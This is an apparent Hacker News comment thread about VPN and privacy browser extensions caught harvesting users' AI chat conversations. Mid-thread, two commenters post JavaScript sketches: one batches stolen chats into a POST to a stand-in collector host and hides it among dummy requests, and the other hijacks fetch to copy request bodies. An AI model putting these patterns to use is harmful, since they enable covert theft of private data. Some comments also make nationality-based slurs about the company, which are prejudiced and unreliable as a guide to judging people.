So much of what's aimed at nontechnical consumers these days is full of dishonesty and abuse. Microsoft kinda turned Windows into something like this, you need OneDrive "for your protection", new telemetry and ads with every update, etc.

In much of the physical world thankfully there's laws and pretty-effective enforcement against people clubbing you on the head and taking your stuff, retail stores selling fake products and empty boxes, etc.

But the tech world is this ever-boiling global cauldron of intangible software processes and code - hard to get a handle on what to even regulate. Wish people would just be decent to each other, and that that would be culturally valued over materialism and moneymaking by any possible means. Perhaps it'll make a comeback.

reply
rkagerer
1 day ago
[-]
This was a nearly poetic way to put it. Thank you for ascribing words to a problem that equally frustrates me.

I spend a lot of time trying to think of concrete ways to improve the situation, and would love to hear people's ideas. Instinctively I tend to agree it largely comes down to treating your users like human beings.

reply
therobots927
1 day ago
[-]
The situation won’t be improved for as long as an incentive structure exists that drives the degradation of the user experience.

Get as off-grid as you possibly can. Try to make your everyday use of technology as deterministic as possible. The free market punishes anyone who “respects their users”. Your best bet is some type of tech co-op funded partially by a billionaire who decided to be nice one day.

reply
pksebben
1 day ago
[-]
We're not totally unempowered here, as folks who know how to tech. We can build open source alternatives that are as easy to use and install as the <epithet>-ware we are trying to combat.

Part of the problem has been that there's a mountain to climb vis a vis that extra ten miles to take something that 'works for me' and turn it into 'gramps can install this and it doesn't trigger his alopecia'.

Rather, that was the problem. If you're looking for a use case for LLMs, look no further. We do actually have the capacity to build user-friendly stuff at a fraction of the time cost that we used to.

We can make the world a better place if we actually give a shit. Make things out in the open, for free, that benefit people who aren't in tech. Chip away at the monopolies by offering a competitive service because it's the right thing to do and history will vindicate you instead of trying to squeeze a buck out of each and every thing.

I'm not saying "don't do a thing for money". You need to do that. We all need to do that. But instead of your next binge watch or fiftieth foray into Zandronum on brutal difficulty, maybe badger your llm to do all the UX/UI tweaks you could never be assed to do for that app you made that one time, so real people can use it. I'm dead certain that there are folks reading this now who have VPN or privacy solutions they've cooked up that don't steal all your data and aren't going to cost you an arm and a leg. At the very least, someone reading this has a network plugin that can sniff for exfiltrated data to known compromised networks (including data brokers) - it's probably just finicky to install, highly technical, and delicate outside of your machine. Tell claude to package that shit so larry luddite can install it and reap the benefits without learning what a bash is or how to emacs.

reply
therobots927
1 day ago
[-]
I agree, and with how much money people in this field can make, I'm surprised there aren't more retired hackers banding together to build something like this. Personally I still have a mortgage to pay off, but eventually I would like to be involved in something like this.
reply
rkagerer
1 day ago
[-]
What product(s) do you think present the best opportunity for reinventing today with a genuine, user-centric approach?

Personally I feel it's everything from the ground up - silicon IC's through to device platforms and cloud services. But we need a plan to chip away at the problem one bite at a time.

reply
therobots927
1 day ago
[-]
Probably a phone OS would be the most impactful. If it had the ability to really cut back on tracking and data sharing by default.

But if you’re talking about building hardware… that feels like something the NSA would be happy to be involved with whether you want them to be or not. I’d vote for an 80/20 solution that gets people protected from some of the most rampant data mining going on by corporations vs. state actors.

The other issue to keep in mind is that the tech ecosystem absolutely will suffocate anything like this by disabling access to their apps / website with this OS. So at the end of the day I really don’t know if there’s a solution to any of this.

reply
jacquesm
1 day ago
[-]
And still, there is plenty of software that you can't run on anything but Windows. That's a major blocker at this point and projects like 'mono' and 'wine', while extremely impressive, are still not good enough to run that same software on Linux.
reply
varenc
1 day ago
[-]
What is the economic value of all these AI chat logs? I can see them being useful for building advertising profiles. But I wonder if they're also just sold as training data to people trying to build their own models?
reply
stevenjgarner
1 day ago
[-]
Pretty easy to match up those logs with browser fingerprinting to identify the actual user. Then you have "do you want to purchase what Mr. Foo Bar is prompting the LLM?"
reply
AznHisoka
1 day ago
[-]
Not just advertising but market research. Loads of people want to know exactly what type of questions ppl are asking these chat bots
reply
why-o-why
1 day ago
[-]
I'm glad the extension system itself isn't broken (e.g. extensions being hacked); these are just scammy extensions to begin with. I've been wary of extensions since they were first offered (though I did like using Greasemonkey to customize everything back in the 2000s/2010s), but I can't resist Privacy Badger and uBlock Origin since they are open source (and even then it's still a risk).
reply
throw310822
1 day ago
[-]
[flagged]
reply
banku_brougham
1 day ago
[-]
I would figure state actors don’t need to go through the trouble of a browser extension. But, yeah.
reply
onion2k
1 day ago
[-]
I'm not a spy so I don't know, but surely in most scenarios it's a lot easier to just ask someone for some data than it is hack/steal it. 25 years of social media has shown that people really don't care about what they do with their data.
reply
Leptonmaniac
1 day ago
[-]
Wasn't there a comment on this phenomenon along the lines of "we were so afraid of 1984 but what we really got was Brave New World"?
reply
omnicognate
1 day ago
[-]
The apathy of the oppressed is a core theme of 1984.
reply
XorNot
1 day ago
[-]
Not really? In 1984 you were made an active participant in the oppression. The Thought Police and the Two Minutes Hate all required your active, enthusiastic participation.

Brave New World was apathy: the system was comfortable, soma was freely available, and there was a whole system to give disruptive elements comfortable but non-disruptive engagement.

The protagonist in Brave New World spends a lot of time resenting the system, but really he just resents his deformity, wanted what it denied him in society, and had no real higher criticisms of it beyond what he felt he couldn't have.

reply
omnicognate
1 day ago
[-]
1984 has coercive elements lacking from Brave New World, but the lack of any political awareness or desire to change things among the proles was critical to the mechanisms of oppression. They were generally content with their lot, and some of the ways of ensuring that have parallels to Brave New World. Violence and hate were used more than sex and drugs but still very much as opiates of the masses: encourage and satisfy base urges to quell any desire to rebel. And sex was used to some extent: although sex was officially for procreation only, prostitution was quietly encouraged among the proles.

You might even imagine 1984's society evolving into Brave New World's as the mechanisms of oppression are gradually refined. Indeed, Aldous Huxley himself suggested as much in a letter to Orwell [1].

[1] https://gizmodo.com/read-aldous-huxleys-review-of-1984-he-se...

reply
Terr_
1 day ago
[-]
Huh? Of course they would: It's way less work than defeating TLS/SSL encryption or hacking into a bunch of different servers.

Bonus points if the government agency can leave most of the work to an ostensibly separate private company, while maintaining a "mutual understanding" of government favors for access.

reply
vasco
1 day ago
[-]
Why wouldn't they? It isn't that you need to, just that obviously you would. You engage with the extension owners by sending an email from a director of a data company instead of as a captain of some military operation. The hit rate is going to be much higher with one of the strategies.
reply
GaryBluto
1 day ago
[-]
Download Valley strikes again!
reply
yoan9224
1 day ago
[-]
This is exactly why we need more transparency in analytics tools. When building products that handle user data, the "free" model almost always means you're the product.

The scary part is these extensions had Google's "Featured" badge. Manual review clearly isn't enough when companies can update code post-approval. We need continuous monitoring, not just one-time vetting.

For anyone building privacy-focused tools: making your data collection transparent and your business model clear upfront is the only way to build trust. Users are getting savvier about this.

reply
chhxdjsj
1 day ago
[-]
How did I know this was an israeli company just by how unethical they are at scale?
reply
talhof8
1 day ago
[-]
Well, you’d be surprised to discover that Koi is also an Israeli company, and they were the ones who even discovered this

https://www.calcalistech.com/ctechnews/article/syoe1xjslx

reply
hnbad
1 day ago
[-]
It would have been no less surprising to me had it been a US company, but it certainly fits the cultural stereotype of callousness that particular country has been openly displaying in recent years.
reply
chhxdjsj
1 day ago
[-]
And what are the odds that mossad are getting access to this data?
reply
kvam
1 day ago
[-]
Some people have mentioned that this is a U.S.-incorporated company (Delaware). I recommend reading Moneyland by Oliver Bullough if you want to know more about the U.S. role as the new shell-company haven.

The island states have been dethroned.

reply
free_bip
1 day ago
[-]
Is the use of WebAssembly going to make spotting these malicious extensions harder?
reply
pyrolistical
1 day ago
[-]
Probably not. All side effects need to go through the JS side, so you can always see where HTTP calls are made
reply
x-complexity
1 day ago
[-]
> Probably not. All side effects need to go through the JS side, so you can always see where HTTP calls are made

That can be circumvented by bundling the conversations into one POST to an API endpoint, along with a few hundred calls to several dummy endpoints to muddy the waters. Bonus points if you can make it look like a normal-passing update script.

It'll still show up in the end, but at this point your main goal is to delay the discovery as much as you can.
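A hypothetical sketch of that batching pattern (all URLs and field names invented): one real POST carrying the data, surrounded by dummy requests that resemble routine telemetry.

```javascript
// Build a request batch where one exfiltration POST hides among
// harmless-looking dummy calls. All endpoints are invented.
function buildRequestBatch(conversations) {
  const requests = [];
  for (let i = 0; i < 5; i++) {
    // Dummy traffic resembling update checks.
    requests.push({ url: `https://cdn.example.com/check?v=${i}`, method: "GET" });
  }
  // The single real payload, bundled into one POST.
  requests.push({
    url: "https://collector.example.com/v1/ingest",
    method: "POST",
    body: JSON.stringify({ batch: conversations }),
  });
  return requests;
}

const batch = buildRequestBatch(["prompt 1", "prompt 2"]);
console.log(batch.length); // 6 requests, only one carrying data
```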

reply
g947o
1 day ago
[-]
As soon as you hijack the fetch function (which cannot be done with WebAssembly alone), it's going to look suspicious, and someone who looks at this carefully enough will flag it.
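As a rough sketch of what such a hijack looks like (and why it stands out in review), here's the wrapper pattern applied to a stub instead of the real `window.fetch`, so it runs standalone:

```javascript
// Wrap a fetch-like function to siphon off request data while passing
// everything through, so nothing appears broken to the user.
const observed = [];

function wrapFetch(realFetch) {
  return function (url, options) {
    observed.push({ url, body: options && options.body }); // side-channel copy
    return realFetch(url, options); // transparent pass-through
  };
}

// Stub standing in for the real fetch implementation.
const stubFetch = (url) => Promise.resolve({ ok: true, url });
const patchedFetch = wrapFetch(stubFetch);

patchedFetch("https://chat.example.com/api/send", { body: "secret prompt" });
console.log(observed); // the wrapper saw the request body
```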
reply
mjmas
1 day ago
[-]
> This means a human at Google reviewed Urban VPN Proxy and concluded it met their standards.

Or that the review happened before the code harvested all the LLM conversations and never got reviewed after it was updated.

reply
growt
1 day ago
[-]
I think this is most likely what happened. The update/review process for extensions is broken. Apparently you can add any malicious functionality after you’re in and also keep any badges and recommendations.
reply
antipaul
1 day ago
[-]
I wouldn't be surprised if this was done by one of those AI companies themselves!

Remember Facebook x Onavo?

"Facebook used a Virtual Private Network (VPN) application it acquired, called Onavo Protect, as a surveillance tool to monitor user activity on competing apps and websites"

reply
hexagonwin
1 day ago
[-]
lol, this Urban VPN addon was available for Firefox too but got removed at some point. https://old.reddit.com/r/firefox/comments/1jb4ura/what_happe...
reply
Agraillo
1 day ago
[-]
Thanks, the last fetched page on archive.org is from 2025-01-26 [1]; it was removed after this date and before 2025-02-13. It had 155,477 users at the time, and the 1-star reviews were mostly about it not working. It's interesting that the developers didn't bother to remove the button linking to the Firefox add-on page for at least several months after the removal. Maybe it was some kind of PR compromise: they probably thought that listing it with a link to a broken page was better than not listing it at all.

A review page [2] mentions that this add-on is a peer-to-peer VPN without its own dedicated servers, which already makes it suspicious.

[1] https://web.archive.org/web/20250126133131/https://addons.mo...

[2] https://www.vpnmentor.com/reviews/urban-vpn/

reply
smallerfish
1 day ago
[-]
Somewhat ironically, this article has significant amounts of AI writing in it. (I've done a lot of AI writing in my own sites, and have been learning how to smother "the voice". This article doesn't do a good job of smothering.)
reply
miladyincontrol
1 day ago
[-]
Oh, a free-of-cost VPN extension that requires access to all sites and data is somehow spyware. Color me surprised.

With those extensions, the user's data and internet connection are the product; most if not all are also selling residential IP access for scrapers, bots, etc.

Good thing Google is protecting users by taking down such harmful extensions as uBlock Origin instead.

reply
SoftTalker
1 day ago
[-]
ublock requires access to all sites and data. Maybe they are trustworthy but who really knows?
reply
fylo
1 day ago
[-]
Let's say we don't trust ublock. At the very least it is still blocking ad networks which do reduce internet performance and are vectors of exploitation, so it is still adding value whether you trust it or not.
reply
Retr0id
1 day ago
[-]
Under the hypothetical that we don't trust ublock, it would be foolish to grant it full access to all data on all websites. It would not be adding value.
reply
DrewADesign
1 day ago
[-]
Yeah — they’d be selling enhanced versions of that data to every site they blocked, and then some. I very much doubt they are.
reply
bandrami
1 day ago
[-]
I mean, I don't trust ublock, for what it's worth. I just disable JavaScript by default, which has pretty much the same effect.
reply
jrochkind1
1 day ago
[-]
Is this criminally prosecutable?
reply
yalogin
1 day ago
[-]
Why would one expect privacy with a VPN, let alone a free one? On the web, all traffic is encrypted point to point, which means individual sites could compromise your privacy, but there is no single funnel through which to lose all your data. A VPN is exactly that! All data goes through a single funnel, and they can target anything they want
reply
estimator7292
1 day ago
[-]
Because VPNs are exclusively and heavily marketed and sold as magical turnkey solutions to privacy, encryption, hair loss, and more!
reply
daniel_iversen
1 day ago
[-]
Would using native AI apps only prevent this? I think so right?
reply
nottorp
1 day ago
[-]
Which "AI" has a native app?

Or you mean the web sites packed with a copy of chromium?

reply
deepfriedbits
1 day ago
[-]
Correct. The article is about Chrome and MS Edge browser extensions.
reply
phkahler
1 day ago
[-]
Why is a security researcher using a free VPN? The standard wisdom is "if it's free, you're the product". So you're going to proxy all your sensitive traffic through a free thing? It's not great to trust paid services with your data, never mind free stuff.

Sometimes knowing tech makes us think we're somehow better and can bypass high level wisdom.

reply
sothatsit
1 day ago
[-]
They are not. They found it by searching for extensions that had the capability to exfiltrate data.

> We asked Wings, our agentic-AI risk engine, to scan for browser extensions with the capability to read and exfiltrate conversations from AI chat platforms.

reply
Rakshath_1
1 day ago
[-]
This is a huge trust failure. A VPN or ad blocker quietly harvesting full AI conversations is the opposite of what users expect, and the fact that these extensions were featured makes it even worse. This really puts the effectiveness of browser extension reviews into question.
reply
raincole
1 day ago
[-]
Am I just paranoid, or is OpenRouter the next privacy bomb waiting to go off? What is their business model anyway?
reply
metaphorproj
1 day ago
[-]
Note that in a model's profile on OpenRouter, under Data Policy, there is a "Prompt Training" field. Some models clearly state that prompt training is enabled, even for paid models.
reply
xeeeeeeeeeeenu
1 day ago
[-]
>What is their business model anyway?

They take a 5.5% fee whenever you buy credits. There's also a discount for opting-in to share your prompts for training.

reply
nwellinghoff
1 day ago
[-]
Nice write up. It would be great if the authors could follow up with a detailed technical walk through of how to use the various tooling to figure out what an extension is really doing.

Could one just feed the extension and a good prompt to claude to do this? Seems like automation CAN sniff this kind of stuff out pretty easily.

reply
dgellow
1 day ago
[-]
Do we know for how much that type of content sells? Not that I'm interested in entering the market, but the economics of that kind of thing are always fascinating. How much are buyers willing to pay for AI conversations? I would expect the value to be pretty low
reply
AznHisoka
1 day ago
[-]
I doubt it's the actual conversations but rather the aggregated insights that are valuable.

Think: is my brand getting mentioned more in AI chats? Are people associating positive or negative feelings towards it? Are more people asking about this topic lately?

reply
dgellow
1 hour ago
[-]
Sure, but are they willing to pay, and if so, how much? There is a meaningful difference between "could be useful" and "valuable enough that we want to buy".
reply
pxtail
1 day ago
[-]
Let's assume that people are discussing medical conditions in these conversations - I think that insurance companies would be pretty interested to get this kind of data in their hands.
reply
dgellow
1 hour ago
[-]
The question isn’t if there is some interesting info in that data but if there are some actual buyers. Lots of interesting data exist, so what’s the value of AI chats?
reply
matt3210
1 day ago
[-]
What would the fallout look like if too many people start to have horror stories about how their lives were destroyed by incriminating, or downright nasty, or simply wrong AI chat history? It'll suddenly become a tool where you can't be honest, if it isn't already.
reply
AznHisoka
1 day ago
[-]
I wish Congress spent as much time fighting over issues like this as it does trying to break up Google. This would be far more impactful.

Articles like this do a decent job of bringing awareness, but we all know Google will do absolutely nothing

reply
ericand
1 day ago
[-]
Can someone just AI all the privacy policies please and tell us who else is pranking?
reply
drnick1
1 day ago
[-]
> A "Featured" badge from Google, meaning it had passed manual review and met what Google describes as "a high standard of user experience and design."

Trusting Google with your privacy is like putting the fox in charge of the henhouse.

reply
tasuki
1 day ago
[-]
> And then an uncomfortable thought: what if someone was reading all of this?

> The thought didn't let go. As a security researcher, I have the tools to answer that question.

What huh, no you don't! As a security researcher you should know better!

reply
tasuki
1 day ago
[-]
> Exactly the kind of tool someone installs when they want to protect themselves online.

No. When you want to increase your security, you install fewer tools.

Each tool increases your exposure. Why is the security industry full of people who don't get this?

reply
ttldlinhtm
21 hours ago
[-]
I think using AI is very helpful today, but if the data is sold it's very bad
reply
dguido
1 day ago
[-]
If you want a VPN you can trust, deploy your own with AlgoVPN: https://github.com/trailofbits/algo
reply
bluepuma77
1 day ago
[-]
I prefer WG-Easy (https://github.com/wg-easy/wg-easy), which uses a Docker container, not ansible.
reply
netbioserror
1 day ago
[-]
I treat extensions like they're all capable of privileged local code execution. My selection is very vetted and very small.
reply
andersa
1 day ago
[-]
The only extensions I have installed are dark reader and ublock origin. Would be nice if I could disable auto updating for them somehow and run local pinned versions...
reply
cluckindan
1 day ago
[-]
Get the source code and manually pack your own unsigned web-ext’s.
reply
temp0826
1 day ago
[-]
Add-ons Manager -> (click the add-on in question) -> change "Allow automatic updates" to "Off"

(for firefox/derivatives anyways...)

reply
matheusmoreira
1 day ago
[-]
Same here, uBlock Origin and EFF's Privacy Badger are the only extensions I trust enough to install.
reply
eszed
1 day ago
[-]
Ditto, plus 1pass / BitWarden.
reply
4ndrewl
1 day ago
[-]
"And then an uncomfortable thought: what if someone was reading all of this?"

If you really are a security researcher then that's not true. You already know all this.

reply
torginus
1 day ago
[-]
Wasn't the whole coercion Google did around Manifest V3 in the name of security?

How is it possible to have extensions this egregiously malicious in the new system?

reply
notjonheyman
1 day ago
[-]
From my experience, Google does not do a thorough app review. Reviewers get maybe a few minutes to review and move on due to the volume of apps awaiting review.
reply
Oarch
1 day ago
[-]
I imagine this would be a great use case for AI helping out?
reply
lodovic
1 day ago
[-]
I'm thinking of installing the extension in a sandbox and then use a local agent to have endless fake conversations with it
reply
automatedideas
1 day ago
[-]
“There’s too much harmful code for humans to review and too few human reviewers.”

“I know, let’s have an AI do all the work for us instead. Let’s take a coffee break.”

reply
free_bip
1 day ago
[-]
No way that could backfire... Prompt injection is a solved problem right?
reply
Dylan16807
1 day ago
[-]
8 million users on sketchy VPN extensions.

70 thousand users on what I would actually call "privacy" extensions.

Bit of a misleading title then.

reply
saretup
1 day ago
[-]
With hardcoded flags like “sendClaudeMessages” and “sendChatgptMessages”, they weren’t even trying to hide it.
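Those two flag names come from the article's report; everything around them in the sketch below is invented, but it shows how plainly such gating reads in source.

```javascript
// Sketch of flag-gated collection. The two flag names are quoted in the
// report; the surrounding structure is hypothetical.
const config = {
  sendChatgptMessages: true,
  sendClaudeMessages: true,
};

function shouldCollect(platform) {
  if (platform === "chatgpt") return config.sendChatgptMessages;
  if (platform === "claude") return config.sendClaudeMessages;
  return false;
}

console.log(shouldCollect("claude")); // true unless the flag is flipped
```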
reply
ArtRichards
1 day ago
[-]
Is this the same Google that is preventing us from installing unapproved software on our phones?
reply
meindnoch
1 day ago
[-]
Only those users that were stupid enough to "converse" with their chatbot.
reply
jmward01
1 day ago
[-]
This is digital assault of 8m people and should be treated that way.
reply
jukkat
1 day ago
[-]
Why can't these browser extensions live in a guarded sandbox? Extensions are given full access to whatever is available on any page. I had the legacy React Developer Tools and Redux DevTools installed for years. What a great attack vector.
reply
andsoitis
1 day ago
[-]
> A free VPN promising privacy and security.

If you are not paying for the product, you are the product.

reply
frm88
1 day ago
[-]
Can we please, please stop using this absolutely outdated proverb? As shown by YouTube Lite, Samsung fridges with ads, cars with telemetry, etc.: even if you paid, you are still subject to manipulation, spyware, ads and telemetry. It has absolutely nothing to do with payment.
reply
andsoitis
1 day ago
[-]
While that’s not untrue, I think one ought to be extra suspicious if you get something of value (eg VPN software that guarantees privacy and security, in this particular case), that cost the operator money but you get it for free.

Perhaps a better proverb would be: there ain’t no free lunch.

reply
RataNova
1 day ago
[-]
If the business model isn't obvious, you are the product
reply
cmiles8
1 day ago
[-]
If the product is free, you are the product.
reply
danielfalbo
1 day ago
[-]
The footer animation of koi.ai is so cool.
reply
cryptoegorophy
1 day ago
[-]
Pro tip: never install any browser extensions. Avoid them like the plague. I had a couple installed that were "legitimate" and I have direct evidence of them leaking/selling my browsing data. Just avoid them.
reply
lionkor
1 day ago
[-]
> We asked Wings, our agentic-AI risk engine

I hate to be that guy, but I am having a difficult time verifying any of this. How likely is it that this is entirely hallucinated? Can anyone independently verify this?

reply
2OEH8eoCRo0
1 day ago
[-]
These conversations can be used to train a competing AI
reply
awaymazdacx5
1 day ago
[-]
There were these two people.

And um, a boy and a girl.

...

Anyway, the thing was that one day they started acting kinda funny. Kinda, weird.

They started being seen exchanging tokens of affection.

And it was rumoured they were engaging in...

reply
hnbad
1 day ago
[-]
Note that this is a pretty blatant GDPR violation and you should report it to your local data protection agency if you are an EU resident and care about this (especially if you've used this extension). Their privacy policy claims the data collection is consent-based and that the app settings let you revoke this consent. According to the article, the latter isn't the case, and the user is never informed of the extent of the collection or of the risk that sensitive or specially protected personal information (e.g. sexual orientation) ends up in the data they're collecting. Their privacy policy states the collected data is filtered to remove this kind of information, but that's irrelevant because processing necessarily happens after collection, and the GDPR already applies at the start of that pipeline.

If Urban VPN is indeed closely affiliated with the data broker, a GDPR fine might also affect that company too given how these fines work. There is a high bar for the kind of misconduct that would result in a fine but it seems plausible that they're being knowingly and deliberately deceptive and engaging in widespread data collection that is intentionally invasive and covert. That would be a textbook example for the kind of behavior the GDPR is meant to target with fines.

The same likely applies to the other extensions mentioned in the article. Yes, "if the product is free, you are the product", but that is exactly why the GDPR exists. The problem isn't that they're harvesting user data but that they're being intentionally deceptive and misleading in their statements about it: they claim consent as the legal basis without having obtained it[0], and they explicitly contradict themselves in their claims ("we're not collecting sensitive information that would need special consideration, but if we do we make sure to find it and remove it before sharing your information, but don't worry because it's mostly used in aggregate, except when it isn't"). Just because you expect some bruising when picking up martial arts as a hobby doesn't mean your sparring partner gets to pummel your face in when you're already knocked out.

[0]: Because "consent" seems to be a hard concept for some people to grasp: it's literally analogous to what you'd want to establish before having sex with someone (though to be fair: the laws are much more lenient about unclear consent for sex because it's less reasonable to expect it to be documented with a paper trail like you can easily do for software). I'll try to keep it SFW but my place of work is not your place of work so think carefully if you want to copy this into your next Powerpoint presentation.

Does your prospective sexual partner have any reason to strongly believe that they can't refuse your advances because doing so would limit their access to something else (e.g. you took them on a date in your car and they can't afford a taxi/uber and public transport isn't available so they rely on you to get back home, aka "the implication")? Then they can't give you voluntary consent because you're (intentionally or not) pressuring them into it. The same goes if you make it much harder for them to refuse than to agree (I can't think of a sex analogy for this because this seems obvious in direct human interactions but somehow some people still think hiding "reject all non-essential" is an option you are allowed to hide between two more steps when the "accept all" button is right there even if the law explicitly prohibits these shenanigans).

Is your prospective sexual partner underage or do they appear extremely naive (e.g. you suspect they've never had any sex ed and don't know what having sex might entail or the risks involved like pregnancy, STIs or, depending on the acts, potential injuries)? Then they probably can't give you informed consent because they don't fully understand what they're consenting to. For data processing this would be failure to disclose the nature of the collection/processing/storage that's about to happen. And no, throwing the entire 100 page privacy policy at them with a consent dialog at the start hardly counts the same way throwing a biology textbook at a minor doesn't make them able to consent.

Is your prospective sexual partner giving you mixed signals but seems to be generally okay with the idea of "taking things further"? Then you're still missing specific consent and better take things one step at a time checking in on them if they're still comfortable with the direction you're taking things before you decide to raw dog their butt (even if they might turn out to be into that). Or in software terms, it's probably better to limit the things you seek consent for to what's currently happening for the user (e.g. a checkbox on a contact form that informs them what you actually intend to do with that data specifically) rather than try to get it all in one big consent modal at the start - this also comes with the advantage that you can directly demonstrate when and how the specific consent relevant to that data was obtained when later having to justify how that data was used in case something goes wrong.

Is your now-active sexual partner in a position where they can no longer tell you to stop (e.g. because they're tied up and ball-gagged)? Then the consent you did obtain isn't revokable (and thus again invalid) because they need to be able to opt out (this is what "safe words" are for and why your dentist tells you to raise your hand where they can see it if you need them to stop during a procedure - given that it's hard to talk with someone's hands in your mouth). In software this means withdrawing consent (or "opting out") should be as easy as it was to give it in the first place - an easy solution is having a "privacy settings" screen easily accessible in the same place as the privacy policy and other mandatory information that at the very least covers everything you stuffed in that consent dialog I told you not to use, as well as anything you tucked away in other forms downstream. This also gives you a nice place to link to at every opportunity to keep your user at ease and relaxed to make the journey more enjoyable for both of you.

reply
deaux
1 day ago
[-]
They're probably only incorporated in the US, so it's meaningless. If they plan to establish a corp in the EU they'll just put it in Ireland and bribe Ireland like all of US big tech does. This is a solved thing.
reply
jsrozner
1 day ago
[-]
TLDR: AI company uses AI to write blog post about abusive AI chrome extension

(Yes it really is AI-written / AI-assisted. If your AI detectors don’t go off when you read it you need to be retrained.)

reply
hathym
1 day ago
[-]
ctrl-f israel: 1 result found
reply
hathym
1 day ago
[-]
4*
reply
brsc2909
1 day ago
[-]
2*
reply
tlogan
1 day ago
[-]
Deleted.
reply
cycomanic
1 day ago
[-]
What sort of argument is that? Just because I need to eat (and let's be real, the developers/owners behind this app are not struggling to put food on the table) doesn't excuse doing unethical/illegal things (and this behaviour is almost certainly illegal, in the EU at least).
reply
atmosx
1 day ago
[-]
There is a “contradictions” section that clearly explains why this is a scam of the highest order.

There are honest ways to make a living. In this case honest is “being transparent” about the way data is handled instead of using newspeak.

reply
jrochkind1
1 day ago
[-]
The guy who holds people up for money in the alley is a human too, people forget, and he needs to pay for food and a place to live. Of course he does.
reply
brikym
1 day ago
[-]
It's ridiculous how many comments are being removed.
reply